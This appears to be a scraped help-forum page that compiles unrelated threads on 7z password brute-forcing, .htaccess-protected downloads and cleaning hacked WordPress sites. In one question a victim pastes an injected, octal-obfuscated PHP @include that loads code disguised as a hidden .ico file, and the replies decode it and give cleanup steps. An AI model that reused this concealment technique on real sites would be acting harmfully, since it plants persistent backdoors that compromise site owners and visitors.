Is it possible to get .7z archive password when you have password protected archive file and decrypted content of that archive file?
If the password is easy and short, the best way is to try brute-force it.
Look at http://telecharger.tomsguide.fr/ZIP-Ultimate-Cracker,0301-1445.html
If you are on Ubuntu, Please have a look at the link below.
https://askubuntu.com/questions/13474/how-do-i-extract-a-password-protected-7z-file
Related
I have a folder that has a .htacess file in it with deny from all. I want to be able to create a link in an email to a file in that folder and allow the user to force download it.
This is exactly like what you do with woocommerce_uploads where, when you buy a download file, it emails you your invoice and you can click the link to download the file.
I need to be able to do the exact same thing, but I don't know how to generate that link.
Please help.
Thanks!
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
My website index.php and htaccess. file got infected and another PHP file of plugin and the website is down now. See the snapshot in this link [https://drive.google.com/open?id=0B6wLmLAtHwZCZnhmV0QzdDMyTW8][1]
could you tell my the way to scan these files? I have scanned with some free antivirus but it is not showing any virus infection. Help to solve this issue.
If your admin panel is accessible, try adding this plugin! It will scan all the files for malware and provide you the full scan report.
Hope this will help!
You need to use Clamav antivirus scanner which can be done via command line.
Download and install it via command line tools. Document for clamav : https://www.clamav.net/documents/installing-clamav
Please try to remove .htacess and index.php file both are default so you can reupload the code from google. Also you can scan your website with maldet scanner.
After I updated wordpress I'm getting this error.
Wp admin URL
http://bit.ly/1TbLXVa
I think something wrong with the /theme/mytheme/functions.php becouse when I disable it it works, but if I disable the site doesn't work. Not sure what the issue is. I even put an old functions.php from the back up.
Attached the functions.php file appriciate if anything can help me.
http://bit.ly/1TRr5lo
Thanks
Ash, are you using any ftp software? if yes then change your file transfer type to binary as in FTP Client,
In Total Commander: locate ‘Transfer mode’ tab in tool bar on top. Then using drop-down selector click ‘Binary (archives, doc etc.)'
FileZilla: in top menu select Transfer> Transfer type> Binary
CuteFTP: navigate to File> Transfer Type> Binary
Refernce Link
My domain has been suspended by my host because they have detected spam.
They say that the file "mailout.php" has been used to send out spam mails.
The file is found here:
/public_html/wp-content/themes/[My_theme]/mailout.php
My host tells me to either delete the file or "protect its functions". So my question is.
Can I delete this file? My site does send out mails after a costumer has placed an order through woocommerce.
What do they mean by "protect its functions"? How do I do that?
I look forward to hear from you! Thanks in advance.
Propably your website was infected by injecting malicious code.
On your server you need find weird files like xyz.php folder with different name than wordpress files and folders.
The best will be change script for send emails and use smtp options not sending by php.
When you need more help I can check that for you but without see problem I can only recommend searching the files at an angle of strange file names and of course delete this wierd files.
First check if mailout.php is normal file from your theme.